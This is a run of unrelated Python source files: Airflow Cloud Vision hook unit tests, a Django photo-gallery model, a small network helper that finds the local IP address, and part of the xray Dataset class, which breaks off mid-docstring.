            location=LOC_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            product=product,
            update_mask=None,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

        assert result == MessageToDict(product)
        constructed_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
        update_product_method.assert_called_once_with(
            product=Product(name=constructed_name), metadata=None, retry=None, timeout=None, update_mask=None
        )

    @parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_product_no_explicit_name_and_missing_params_for_constructed_name(
        self, location, product_id, get_conn
    ):
        """Missing name params with an unnamed Product raise before any API call."""
        update_product_method = get_conn.return_value.update_product
        update_product_method.return_value = None

        with pytest.raises(AirflowException) as ctx:
            self.hook.update_product(
                location=location,
                product_id=product_id,
                product=Product(),
                update_mask=None,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )

        assert ctx.value
        assert ERR_UNABLE_TO_CREATE.format(label='Product', id_label='product_id') in str(ctx.value)
        update_product_method.assert_not_called()

    @parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_product_explicit_name_missing_params_for_constructed_name(
        self, location, product_id, get_conn
    ):
        """A Product with an explicit name works even if name params are missing."""
        preset_name = ProductSearchClient.product_path(
            PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
        )
        product = Product(name=preset_name)
        update_product_method = get_conn.return_value.update_product
        update_product_method.return_value = product

        result = self.hook.update_product(
            location=location,
            product_id=product_id,
            product=product,
            update_mask=None,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

        assert result == MessageToDict(product)
        update_product_method.assert_called_once_with(
            product=Product(name=preset_name), metadata=None, retry=None, timeout=None, update_mask=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_product_explicit_name_different_from_constructed(self, get_conn):
        """Conflicting explicit vs. constructed Product names raise an error."""
        update_product_method = get_conn.return_value.update_product
        update_product_method.return_value = None
        explicit_name = ProductSearchClient.product_path(
            PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
        )
        constructed_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)

        # location/product_id yield a name differing from the explicit one,
        # which the hook must reject.
        with pytest.raises(AirflowException) as ctx:
            self.hook.update_product(
                location=LOC_ID_TEST,
                product_id=PRODUCT_ID_TEST,
                product=Product(name=explicit_name),
                update_mask=None,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )

        expected_message = ERR_DIFF_NAMES.format(
            explicit_name=explicit_name,
            constructed_name=constructed_name,
            label="Product",
            id_label="product_id",
        )
        assert ctx.value
        assert expected_message in str(ctx.value)
        update_product_method.assert_not_called()

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_delete_product(self, get_conn):
        """delete_product returns None and targets the constructed name."""
        delete_product_method = get_conn.return_value.delete_product
        delete_product_method.return_value = None
        expected_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)

        result = self.hook.delete_product(
            location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, project_id=PROJECT_ID_TEST
        )

        assert result is None
        delete_product_method.assert_called_once_with(
            name=expected_name, retry=None, timeout=None, metadata=None
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_detect_text(self, annotator_client_mock):
        """text_detection calls the annotator client with default arguments."""
        text_detection_mock = annotator_client_mock.text_detection
        text_detection_mock.return_value = AnnotateImageResponse(
            text_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        self.hook.text_detection(image=DETECT_TEST_IMAGE)

        text_detection_mock.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_detect_text_with_additional_properties(self, annotator_client_mock):
        """additional_properties are expanded into extra keyword arguments."""
        text_detection_mock = annotator_client_mock.text_detection
        text_detection_mock.return_value = AnnotateImageResponse(
            text_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        self.hook.text_detection(
            image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
        )

        text_detection_mock.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_detect_text_with_error_response(self, annotator_client_mock):
        """An error in the API response is surfaced as an AirflowException."""
        text_detection_mock = annotator_client_mock.text_detection
        text_detection_mock.return_value = AnnotateImageResponse(
            error={"code": 3, "message": "test error message"}
        )

        with pytest.raises(AirflowException) as ctx:
            self.hook.text_detection(image=DETECT_TEST_IMAGE)

        assert "test error message" in str(ctx.value)

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_document_text_detection(self, annotator_client_mock):
        """document_text_detection calls the annotator client with defaults."""
        doc_detection_mock = annotator_client_mock.document_text_detection
        doc_detection_mock.return_value = AnnotateImageResponse(
            text_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        self.hook.document_text_detection(image=DETECT_TEST_IMAGE)

        doc_detection_mock.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_document_text_detection_with_additional_properties(self, annotator_client_mock):
        """additional_properties are expanded into extra keyword arguments."""
        doc_detection_mock = annotator_client_mock.document_text_detection
        doc_detection_mock.return_value = AnnotateImageResponse(
            text_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        self.hook.document_text_detection(
            image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
        )

        doc_detection_mock.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_detect_document_text_with_error_response(self, annotator_client_mock):
        """An error in the API response is surfaced as an AirflowException."""
        doc_detection_mock = annotator_client_mock.document_text_detection
        doc_detection_mock.return_value = AnnotateImageResponse(
            error={"code": 3, "message": "test error message"}
        )

        with pytest.raises(AirflowException) as ctx:
            self.hook.document_text_detection(image=DETECT_TEST_IMAGE)

        assert "test error message" in str(ctx.value)

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_label_detection(self, annotator_client_mock):
        """Hook should forward the image plus default kwargs to the client."""
        client_method = annotator_client_mock.label_detection
        client_method.return_value = AnnotateImageResponse(
            label_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        self.hook.label_detection(image=DETECT_TEST_IMAGE)

        client_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_label_detection_with_additional_properties(self, annotator_client_mock):
        """Entries of `additional_properties` should be forwarded as extra kwargs."""
        detect = annotator_client_mock.label_detection
        detect.return_value = AnnotateImageResponse(
            label_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        self.hook.label_detection(
            image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
        )

        detect.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_label_detection_with_error_response(self, annotator_client_mock):
        """An error payload in the API response should raise AirflowException."""
        annotator_client_mock.label_detection.return_value = AnnotateImageResponse(
            error={"code": 3, "message": "test error message"}
        )

        with pytest.raises(AirflowException) as ctx:
            self.hook.label_detection(image=DETECT_TEST_IMAGE)

        assert "test error message" in str(ctx.value)

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_safe_search_detection(self, annotator_client_mock):
        """Hook should forward the image plus default kwargs to the client."""
        client_method = annotator_client_mock.safe_search_detection
        client_method.return_value = AnnotateImageResponse(
            safe_search_annotation=SafeSearchAnnotation(
                adult="VERY_UNLIKELY",
                spoof="VERY_UNLIKELY",
                medical="VERY_UNLIKELY",
                violence="VERY_UNLIKELY",
                racy="VERY_UNLIKELY",
            )
        )

        self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)

        client_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_safe_search_detection_with_additional_properties(self, annotator_client_mock):
        """Entries of `additional_properties` should be forwarded as extra kwargs."""
        detect = annotator_client_mock.safe_search_detection
        detect.return_value = AnnotateImageResponse(
            safe_search_annotation=SafeSearchAnnotation(
                adult="VERY_UNLIKELY",
                spoof="VERY_UNLIKELY",
                medical="VERY_UNLIKELY",
                violence="VERY_UNLIKELY",
                racy="VERY_UNLIKELY",
            )
        )

        self.hook.safe_search_detection(
            image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
        )

        detect.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_safe_search_detection_with_error_response(self, annotator_client_mock):
        """An error payload in the API response should raise AirflowException."""
        annotator_client_mock.safe_search_detection.return_value = AnnotateImageResponse(
            error={"code": 3, "message": "test error message"}
        )

        with pytest.raises(AirflowException) as ctx:
            self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)

        assert "test error message" in str(ctx.value)

from django.db import models
from django.utils.html import format_html
from sorl.thumbnail import get_thumbnail
from sorl.thumbnail.fields import ImageField
from sno.models import Sno


class SnoGalleries(models.Model):
    """A photo in the gallery of an SNO (student scientific organisation)."""

    class Meta:
        verbose_name = 'Фотография в галереи СНО'
        verbose_name_plural = 'Фотографии в галереи СНО'

    # Optional photo title ("Название фото"); may be left blank.
    name = models.CharField('Название фото', max_length=255, blank=True, null=True)
    # The image itself ("Фото"); thumbnailed by sorl in photo_preview().
    photo = ImageField(verbose_name='Фото', max_length=255)
    # Optional free-form description ("Описание").
    description = models.TextField('Описание', blank=True, null=True)
    # Owning SNO; deleting the SNO cascades to its gallery photos.
    sno = models.ForeignKey(Sno, verbose_name='СНО', on_delete=models.CASCADE)
    # Set automatically when the row is first saved.
    date_created = models.DateField('Дата', auto_now_add=True)

    def photo_preview(self):
        """Return a 75x75 thumbnail linked to the full-size image
        (used as a column label via short_description below).
        """
        img = get_thumbnail(self.photo, '75x75', crop='center')
        return format_html('<a href="{}" target="_blank"><img style="width:75px; height:75px;" src="{}"></a>',
                           self.photo.url, img.url)

    photo_preview.short_description = 'Фото'

    def __str__(self):
        # NOTE(review): when `name` is blank/null this renders as "None (...)"
        # — confirm whether a fallback to an empty string is intended.
        return '%s (%s)' % (self.name, self.sno.short_name)

# Copyright 2018 Flight Lab authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for network related helpers."""

import socket


def get_ip():
  """Get primary IP (the one with a default route) of local machine.

  This works on both Linux and Windows platforms, and doesn't require a
  working internet connection: connecting a UDP socket sends no packets,
  but makes the OS choose the outbound interface.

  Returns:
    Dotted-quad IP string of the primary interface, or '127.0.0.1' when it
    cannot be determined (e.g. no network configured).
  """
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  try:
    # The address doesn't even have to be reachable.
    s.connect(('10.255.255.255', 1))
    return s.getsockname()[0]
  except OSError:
    # Narrowed from a bare `except:`, which also swallowed
    # KeyboardInterrupt and SystemExit.
    return '127.0.0.1'
  finally:
    s.close()

import functools
import warnings
from collections import Mapping, Sequence
from numbers import Number

import numpy as np
import pandas as pd

from . import ops
from . import utils
from . import common
from . import groupby
from . import indexing
from . import alignment
from . import formatting
from .. import conventions
from .alignment import align, partial_align
from .coordinates import DatasetCoordinates, Indexes
from .common import ImplementsDatasetReduce, BaseDataObject
from .utils import (Frozen, SortedKeysDict, ChainMap, maybe_wrap_array)
from .variable import as_variable, Variable, Coordinate, broadcast_variables
from .pycompat import (iteritems, itervalues, basestring, OrderedDict,
                       dask_array_type)
from .combine import concat


# Attributes of pd.DatetimeIndex that are ndarrays of time info; these are
# the names that can be resolved as virtual variables (e.g. 'time.month').
_DATETIMEINDEX_COMPONENTS = ['year', 'month', 'day', 'hour', 'minute',
                             'second', 'microsecond', 'nanosecond', 'date',
                             'time', 'dayofyear', 'weekofyear', 'dayofweek',
                             'quarter']


def _get_virtual_variable(variables, key):
    """Resolve a virtual variable such as 'time.year' against a dict of
    xray.Variable objects, raising KeyError when it cannot be resolved.
    """
    if not isinstance(key, basestring):
        raise KeyError(key)

    parts = key.split('.', 1)
    if len(parts) != 2:
        raise KeyError(key)
    ref_name, var_name = parts

    ref_var = variables[ref_name]
    if ref_var.ndim == 1:
        date = ref_var.to_index()
    elif ref_var.ndim == 0:
        date = pd.Timestamp(ref_var.values)
    else:
        # only scalars and 1D time variables support component access
        raise KeyError(key)

    if var_name != 'season':
        data = getattr(date, var_name)
    else:
        # TODO: move 'season' into pandas itself
        seasons = np.array(['DJF', 'MAM', 'JJA', 'SON'])
        data = seasons[(date.month // 3) % 4]
    return ref_name, var_name, Variable(ref_var.dims, data)


def _as_dataset_variable(name, var):
    """Coerce ``var`` into a Variable suitable for insertion into a Dataset
    under ``name``.
    """
    try:
        var = as_variable(var, key=name)
    except TypeError:
        raise TypeError('Dataset variables must be an array or a tuple of '
                        'the form (dims, data[, attrs, encoding])')
    if name not in var.dims:
        return var
    # a variable named after one of its own dimensions is an index coordinate
    if var.ndim != 1:
        raise ValueError('an index variable must be defined with '
                         '1-dimensional data')
    return var.to_coord()


def _align_variables(variables, join='outer'):
    """Align every DataArray value in ``variables``; other values are kept
    unchanged.
    """
    keys = [name for name, value in variables.items()
            if hasattr(value, 'indexes')]
    realigned = align(*[variables[name] for name in keys],
                      join=join, copy=False)
    result = OrderedDict(variables)
    result.update(zip(keys, realigned))
    return result


def _expand_variables(raw_variables, old_variables=None, compat='identical'):
    """Expand a dictionary of variables.

    Returns a dictionary of Variable objects suitable for inserting into a
    Dataset._variables dictionary.

    This includes converting tuples (dims, data) into Variable objects,
    converting coordinate variables into Coordinate objects and expanding
    DataArray objects into Variables plus coordinates.

    Raises ValueError if any conflicting values are found, between any of the
    new or old variables.

    Parameters
    ----------
    raw_variables : mapping
        Mapping from names to DataArray / Variable / tuple definitions.
    old_variables : mapping, optional
        Existing variables the new ones are checked against for conflicts.
        Defaults to an empty dict.  (This was previously a mutable ``{}``
        default argument; ``None`` avoids sharing state across calls.)
    compat : str, optional
        Name of the Variable comparison method used for conflict detection.
    """
    if old_variables is None:
        old_variables = {}
    new_variables = OrderedDict()
    new_coord_names = set()
    # writes to the ChainMap land in new_variables; old_variables is read-only
    variables = ChainMap(new_variables, old_variables)

    def maybe_promote_or_replace(name, var):
        # Under compat='broadcast_equals', a matching variable may need its
        # dimensions expanded to the union of both shapes.
        existing_var = variables[name]
        if name not in existing_var.dims:
            if name in var.dims:
                variables[name] = var
            else:
                common_dims = OrderedDict(zip(existing_var.dims,
                                              existing_var.shape))
                common_dims.update(zip(var.dims, var.shape))
                variables[name] = existing_var.expand_dims(common_dims)
                new_coord_names.update(var.dims)

    def add_variable(name, var):
        var = _as_dataset_variable(name, var)
        if name not in variables:
            variables[name] = var
            new_coord_names.update(variables[name].dims)
        else:
            if not getattr(variables[name], compat)(var):
                raise ValueError('conflicting value for variable %s:\n'
                                 'first value: %r\nsecond value: %r'
                                 % (name, variables[name], var))
            if compat == 'broadcast_equals':
                maybe_promote_or_replace(name, var)

    for name, var in iteritems(raw_variables):
        if hasattr(var, 'coords'):
            # it's a DataArray: pull in its coordinates as well
            new_coord_names.update(var.coords)
            for dim, coord in iteritems(var.coords):
                if dim != name:
                    add_variable(dim, coord.variable)
            var = var.variable
        add_variable(name, var)

    return new_variables, new_coord_names


def _calculate_dims(variables):
    """Calculate the dimensions corresponding to a set of variables.

    Returns dictionary mapping from dimension names to sizes. Raises ValueError
    if any of the dimension sizes conflict.
    """
    dims = {}
    last_used = {}
    # dimensionless variables may not share a name with a dimension
    scalar_vars = set(name for name, var in iteritems(variables)
                      if not var.dims)
    for name, var in iteritems(variables):
        for dim, size in zip(var.dims, var.shape):
            if dim in scalar_vars:
                raise ValueError('dimension %s already exists as a scalar '
                                 'variable' % dim)
            if dim not in dims:
                dims[dim] = size
                last_used[dim] = name
            elif dims[dim] != size:
                raise ValueError('conflicting sizes for dimension %r: '
                                 'length %s on %r and length %s on %r' %
                                 (dim, size, name, dims[dim], last_used[dim]))
    return dims


def _merge_expand(aligned_self, other, overwrite_vars, compat):
    """Expand ``other`` against the variables of ``aligned_self`` that are not
    scheduled to be overwritten, returning the merged variable dictionaries.
    """
    possible_conflicts = dict((name, var)
                              for name, var in aligned_self._variables.items()
                              if name not in overwrite_vars)
    new_vars, new_coord_names = _expand_variables(other, possible_conflicts,
                                                  compat)
    replace_vars = aligned_self._variables.copy()
    replace_vars.update(new_vars)
    return replace_vars, new_vars, new_coord_names


def _merge_dataset(self, other, overwrite_vars, compat, join):
    """Merge another Dataset into ``self`` after aligning the pair."""
    aligned_self, other = partial_align(self, other, join=join, copy=False)

    merged = _merge_expand(aligned_self, other._variables, overwrite_vars,
                           compat)
    replace_vars, new_vars, new_coord_names = merged
    new_coord_names.update(other._coord_names)
    return replace_vars, new_vars, new_coord_names


def _merge_dict(self, other, overwrite_vars, compat, join):
    """Merge a dict of variables into ``self`` after aligning everything."""
    other = _align_variables(other, join='outer')

    alignable = [name for name, value in other.items()
                 if hasattr(value, 'indexes')]
    aligned = partial_align(self, *[other[name] for name in alignable],
                            join=join, copy=False, exclude=overwrite_vars)
    aligned_self = aligned[0]

    other = OrderedDict(other)
    other.update(zip(alignable, aligned[1:]))
    return _merge_expand(aligned_self, other, overwrite_vars, compat)


def _assert_empty(args, msg='%s'):
    if args:
        raise ValueError(msg % args)


def as_dataset(obj):
    """Cast the given object to a Dataset.

    Handles DataArrays, Datasets and dictionaries of variables. A new Dataset
    object is only created in the last case.
    """
    obj = getattr(obj, '_dataset', obj)
    if isinstance(obj, Dataset):
        return obj
    return Dataset(obj)


class Variables(Mapping):
    """Mapping view over a Dataset's data variables: everything stored in
    ``_variables`` that is not registered as a coordinate.
    """

    def __init__(self, dataset):
        self._dataset = dataset

    def __iter__(self):
        return (name for name in self._dataset._variables
                if name not in self._dataset._coord_names)

    def __len__(self):
        ds = self._dataset
        return len(ds._variables) - len(ds._coord_names)

    def __contains__(self, key):
        ds = self._dataset
        return key in ds._variables and key not in ds._coord_names

    def __getitem__(self, key):
        if key in self._dataset._coord_names:
            # coordinates are deliberately hidden from this view
            raise KeyError(key)
        return self._dataset[key]

    def __repr__(self):
        return formatting.vars_repr(self)


class _LocIndexer(object):
    def __init__(self, dataset):
        self.dataset = dataset

    def __getitem__(self, key):
        if not utils.is_dict_like(key):
            raise TypeError('can only lookup dictionaries from Dataset.loc')
        return self.dataset.sel(**key)


class Dataset(Mapping, ImplementsDatasetReduce, BaseDataObject):
    """A multi-dimensional, in memory, array database.

    A dataset resembles an in-memory representation of a NetCDF file, and
    consists of variables, coordinates and attributes which together form a
    self describing dataset.

    Dataset implements the mapping interface with keys given by variable names
    and values given by DataArray objects for each variable name.

    One dimensional variables with name equal to their dimension are index
    coordinates used for label based indexing.
    """
    # class properties defined for the benefit of __setstate__, which otherwise
    # runs into trouble because we overrode __getattr__
    _attrs = None
    _variables = Frozen({})

    groupby_cls = groupby.DatasetGroupBy

    def __init__(self, variables=None, coords=None, attrs=None,
                 compat='broadcast_equals'):
        """To load data from a file or file-like object, use the `open_dataset`
        function.

        Parameters
        ----------
        variables : dict-like, optional
            A mapping from variable names to :py:class:`~xray.DataArray`
            objects, :py:class:`~xray.Variable` objects or tuples of the
            form ``(dims, data[, attrs])``.  Each dimension must have the
            same length in all variables in which it appears.
        coords : dict-like, optional
            Another mapping in the same form as `variables`, except each item
            is saved on the dataset as a "coordinate": a constant/fixed
            quantity, unlike the varying/measured quantities in `variables`.
            Coordinate values may be 1-dimensional arrays or scalars, in which
            case `dims` do not need to be supplied: 1D arrays are assumed to
            give index values along the dimension with the same name.
        attrs : dict-like, optional
            Global attributes to save on this dataset.
        compat : {'broadcast_equals', 'equals', 'identical'}, optional
            How to compare same-named variables for potential conflicts:

            - 'broadcast_equals': all values must be equal when variables are
              broadcast against each other to ensure common dimensions.
            - 'equals': all values and dimensions must be the same.
            - 'identical': all values, dimensions and attributes must be the
              same.
        """
        self._variables = OrderedDict()
        self._coord_names = set()
        self._dims = {}
        self._attrs = None
        self._file_obj = None

        variables = {} if variables is None else variables
        coords = set() if coords is None else coords
        if variables or coords:
            self._set_init_vars_and_dims(variables, coords, compat)
        if attrs is not None:
            self.attrs = attrs

    def _add_missing_coords_inplace(self):
        """Create a default Coordinate for every dimension that has no
        variable of its own, writing directly into self._variables.
        """
        for dim, size in iteritems(self.dims):
            if dim in self._variables:
                continue
            # Equivalent to np.arange(size), but the array is only
            # materialized when actually accessed.
            data = indexing.LazyIntegerRange(size)
            self._variables[dim] = Coordinate(dim, data)

    def _update_vars_and_coords(self, new_variables, new_coord_names=None,
                                needs_copy=True, check_coord_names=True):
        """Add a dictionary of new variables to this dataset.

        Raises a ValueError if any dimensions have conflicting lengths in the
        new dataset. Otherwise will update this dataset's _variables and
        _dims attributes in-place.

        Parameters
        ----------
        new_variables : dict
            Mapping from names to Variable objects to insert.
        new_coord_names : iterable of str, optional
            Names to additionally register as coordinates.  Defaults to none.
            (This was previously a mutable ``{}`` default argument.)
        needs_copy : bool, optional
            Set `needs_copy=False` only if this dataset is brand-new and hence
            can be thrown away if this method fails.
        check_coord_names : bool, optional
            If True, reject coordinate names that already exist as data
            variables.
        """
        if new_coord_names is None:
            new_coord_names = set()
        # default to creating another copy of variables so can unroll if we
        # end up with inconsistent dimensions
        variables = self._variables.copy() if needs_copy else self._variables

        if check_coord_names:
            _assert_empty([k for k in self.data_vars if k in new_coord_names],
                          'coordinates with these names already exist as '
                          'variables: %s')

        variables.update(new_variables)
        dims = _calculate_dims(variables)
        # all checks are complete: it's safe to update
        self._variables = variables
        self._dims = dims
        self._add_missing_coords_inplace()
        self._coord_names.update(new_coord_names)

    def _set_init_vars_and_dims(self, vars, coords, compat):
        """Populate variables and dimensions from the constructor arguments."""
        _assert_empty([k for k in vars if k in coords],
                      'redundant variables and coordinates: %s')

        aligned = _align_variables(ChainMap(vars, coords))
        new_variables, new_coord_names = _expand_variables(aligned,
                                                           compat=compat)
        new_coord_names.update(coords)

        self._update_vars_and_coords(new_variables, new_coord_names,
                                     needs_copy=False, check_coord_names=False)

    @classmethod
    def load_store(cls, store, decoder=None):
        """Create a new dataset from the contents of a backends.*DataStore
        object, optionally passing its variables/attributes through
        ``decoder`` first.
        """
        variables, attributes = store.load()
        if decoder:
            variables, attributes = decoder(variables, attributes)
        dataset = cls(variables, attrs=attributes)
        dataset._file_obj = store
        return dataset

    def close(self):
        """Close any files linked to this dataset
        """
        # Safe to call repeatedly: the reference is cleared after closing.
        if self._file_obj is not None:
            self._file_obj.close()
        self._file_obj = None

    def __enter__(self):
        # Context-manager support: ``with dataset: ...``
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Close any linked files on exit; exceptions are not suppressed.
        self.close()

    def __getstate__(self):
        """Always load data in-memory before pickling."""
        self.load()
        # self.__dict__ is the default pickle object; no custom __setstate__
        # is needed.  Drop datastore references so they are not pickled.
        state = dict(self.__dict__)
        state['_file_obj'] = None
        return state

    @property
    def variables(self):
        """Frozen dictionary of xray.Variable objects constituting this
        dataset's data (coordinate variables included).
        """
        return Frozen(self._variables)

    def _attrs_copy(self):
        # Shallow-copy attrs, preserving None to mean "no attrs yet".
        if self._attrs is None:
            return None
        return OrderedDict(self._attrs)

    @property
    def attrs(self):
        """Dictionary of global attributes on this dataset, created lazily on
        first access.
        """
        if self._attrs is None:
            self._attrs = OrderedDict()
        return self._attrs

    @attrs.setter
    def attrs(self, value):
        # always store a fresh OrderedDict so callers cannot alias our state
        self._attrs = OrderedDict(value)

    @property
    def dims(self):
        """Mapping from dimension names to lengths.

        This dictionary cannot be modified directly, but is updated when adding
        new variables.
        """
        # read-only view; SortedKeysDict iterates the names in sorted order
        return Frozen(SortedKeysDict(self._dims))

    def load(self):
        """Manually trigger loading of this dataset's data from disk or a
        remote source into memory and return this dataset.

        Normally, it should not be necessary to call this method in user code,
        because all xray functions should either work on deferred data or
        load data automatically. However, this method can be necessary when
        working with many file objects on disk.

        Returns
        -------
        self : Dataset
        """
        # access .data to coerce everything to numpy or dask arrays
        all_data = dict((k, v.data) for k, v in self.variables.items())
        lazy_data = dict((k, v) for k, v in all_data.items()
                         if isinstance(v, dask_array_type))
        if lazy_data:
            import dask.array as da

            # evaluate all the dask arrays simultaneously
            evaluated_data = da.compute(*lazy_data.values())

            # write the concrete arrays back onto the variables
            # (the unused `evaluated_variables = {}` local was removed)
            for k, data in zip(lazy_data, evaluated_data):
                self.variables[k].data = data

        return self

    def load_data(self):  # pragma: no cover
        """Deprecated alias for :py:meth:`load`."""
        warnings.warn('the Dataset method `load_data` has been deprecated; '
                      'use `load` instead',
                      FutureWarning, stacklevel=2)
        return self.load()

    @classmethod
    def _construct_direct(cls, variables, coord_names, dims, attrs,
                          file_obj=None):
        """Shortcut around __init__ for internal use when we want to skip
        costly validation.

        Arguments are installed on the new instance without copying or
        consistency checks; callers must guarantee they are coherent.
        """
        obj = object.__new__(cls)
        obj._variables = variables
        obj._coord_names = coord_names
        obj._dims = dims
        obj._attrs = attrs
        obj._file_obj = file_obj
        return obj

    __default_attrs = object()

    def _replace_vars_and_dims(self, variables, coord_names=None,
                               attrs=__default_attrs, inplace=False):
        """Fastpath constructor for internal use.

        Preserves coord names and attributes; dimensions are recalculated from
        the supplied variables.

        The arguments are *not* copied when placed on the new dataset. It is up
        to the caller to ensure that they have the right type and are not used
        elsewhere.

        Parameters
        ----------
        variables : OrderedDict
        coord_names : set or None, optional
            If None, the current coordinate names are reused.
        attrs : OrderedDict or None, optional
            Defaults to a sentinel meaning "keep the current attributes";
            passing None explicitly clears them.
        inplace : bool, optional
            If True, mutate this dataset instead of constructing a new one.

        Returns
        -------
        new : Dataset
        """
        dims = _calculate_dims(variables)
        if inplace:
            self._dims = dims
            self._variables = variables
            if coord_names is not None:
                self._coord_names = coord_names
            # identity check against the sentinel: None is a legal attrs value
            if attrs is not self.__default_attrs:
                self._attrs = attrs
            obj = self
        else:
            if coord_names is None:
                coord_names = self._coord_names.copy()
            if attrs is self.__default_attrs:
                attrs = self._attrs_copy()
            obj = self._construct_direct(variables, coord_names, dims, attrs)
        return obj

    def copy(self, deep=False):
        """Returns a copy of this dataset.

        If `deep=True`, a deep copy is made of each of the component variables.
        Otherwise, a shallow copy is made, so each variable in the new dataset
        is also a variable in the original dataset.
        """
        variables = (OrderedDict((name, var.copy(deep=True))
                                 for name, var in iteritems(self._variables))
                     if deep else self._variables.copy())
        # skip __init__ to avoid costly validation
        return self._construct_direct(variables, self._coord_names.copy(),
                                      self._dims.copy(), self._attrs_copy())

    def _copy_listed(self, names, keep_attrs=True):
        """Create a new Dataset with the listed variables from this dataset
        and all relevant coordinates. Skips all validation.
        """
        variables = OrderedDict()
        coord_names = set()

        for name in names:
            if name in self._variables:
                variables[name] = self._variables[name]
            else:
                # fall back to virtual variables like 'time.year'
                ref_name, var_name, var = _get_virtual_variable(
                    self._variables, name)
                variables[var_name] = var
                if ref_name in self._coord_names:
                    coord_names.add(var_name)

        needed_dims = set()
        for var in variables.values():
            needed_dims.update(var._dims)

        # carry over every coordinate fully contained in the needed dims
        for name in self._coord_names:
            if set(self._variables[name]._dims) <= needed_dims:
                variables[name] = self._variables[name]
                coord_names.add(name)

        dims = dict((dim, self._dims[dim]) for dim in needed_dims)
        attrs = self.attrs.copy() if keep_attrs else None
        return self._construct_direct(variables, coord_names, dims, attrs)

    def __copy__(self):
        # shallow copy, for the copy module
        return self.copy(deep=False)

    def __deepcopy__(self, memo=None):
        # memo does nothing but is required for compatibility with
        # copy.deepcopy
        return self.copy(deep=True)

    def __contains__(self, key):
        """The 'in' operator will return true or false depending on whether
        'key' is an array in the dataset or not.
        """
        # checks _variables directly, so coordinates count as members too
        return key in self._variables

    def __len__(self):
        # counts all variables, coordinates included
        return len(self._variables)

    def __iter__(self):
        # iterates over all variable names, coordinates included
        return iter(self._variables)

    @property
    def nbytes(self):
        # total in-memory size: sum of nbytes over all variables
        return sum(v.nbytes for v in self.variables.values())

    @property
    def loc(self):
        """Attribute for location based indexing. Only supports __getitem__,
